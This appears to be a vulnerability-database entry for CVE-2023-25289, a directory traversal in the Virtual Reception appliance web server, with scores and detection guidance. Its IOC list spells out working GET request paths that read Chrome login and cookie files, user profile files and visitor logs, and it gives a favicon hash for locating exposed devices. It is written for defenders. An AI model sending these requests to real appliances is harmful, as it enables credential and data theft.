cbcvebase.
CVE-2023-25289
published 2023-05-04

CVE-2023-25289: Directory Traversal vulnerability in virtualreception Digital Receptie version win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 in embedded web server, allows…

PriorityP258high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
7.69%
93.8th percentile
Directory Traversal vulnerability in virtualreception Digital Receptie version win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 in embedded web server, allows attacker to gain sensitive information via a crafted GET request.

Affected

1 ranges
VendorProductVersion rangeFixed in
virtualreceptiondigital_reciptie

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
urlhttp://[ip address]/C:/windows/WindowsUpdate.log
urlhttp://[ip address]/c:/users/receptie/ntuser.dat
urlhttp://[ip address]/c:/users/receptie/ntuser.ini
urlhttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
urlhttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data
urlhttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
urlhttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Cookies
urlhttp://[ip address]/visitors.csv
pathc:/WINDOWS/System32/drivers/etc/hosts
pathc:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data
pathc:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Cookies
otherhttp.favicon.hash:656388049
  • Detect directory traversal attempts by monitoring HTTP GET requests containing Windows absolute path patterns (e.g., '/c:/' or '/C:/') in the URI, which are characteristic of this vulnerability's exploitation pattern.
  • Monitor for HTTP GET requests targeting sensitive Chrome credential files via path traversal: 'Login Data', 'Cookies', and 'Local State' under the 'receptie' user profile.
  • Monitor for unauthenticated HTTP GET requests to '/visitors.csv' on Virtual Reception appliances, which exposes visitor registration logs.
  • Use Shodan favicon hash 656388049 to identify exposed Virtual Reception appliances on the internet for asset discovery and attack surface monitoring.
  • The vulnerability is unauthenticated; no session token or credential is required. Any HTTP GET request with a Windows absolute path in the URI should be treated as a traversal attempt.
  • ·The traversal works by appending Windows absolute paths directly to the server root URL (e.g., '/c:/...'), not via classic '../' sequences. Detection rules must account for this Windows drive-letter path injection pattern.
  • ·The affected appliance runs on Windows 7 SP1 (win7sp1_rtm.101119-1850 6.1.7601.1.0.65792) on Intel NUC5i5RY hardware; detections should be scoped to this platform context.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.